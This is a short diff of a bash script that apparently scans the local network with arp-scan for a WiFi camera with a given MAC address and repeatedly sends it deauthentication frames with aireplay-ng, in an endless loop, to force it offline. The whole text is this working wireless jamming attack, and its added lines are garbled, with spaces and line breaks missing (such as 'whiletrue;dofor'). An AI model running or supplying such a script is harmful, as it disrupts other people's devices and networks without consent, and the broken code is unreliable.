 airmon-ng stop mon0 # Pull down any lingering monitor devices

-for TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \
+airmon-ng start $NIC# Start a monitor devicewhiletrue;dofor TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \'([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}')doif[["$TARGET"=="$GGMAC"]]then# Audio alert

 beep -f 1000 -l 500 -n 200 -r 2

-echo "WiFi camera discovered: "$TARGET >> $LOG
+echo"WiFi camera discovered: "$TARGET >> $LOG

 aireplay-ng -0 1 -a $BSSID -c $TARGET mon0

-sleep $POLL
+sleep $POLLdone

 airmon-ng stop mon0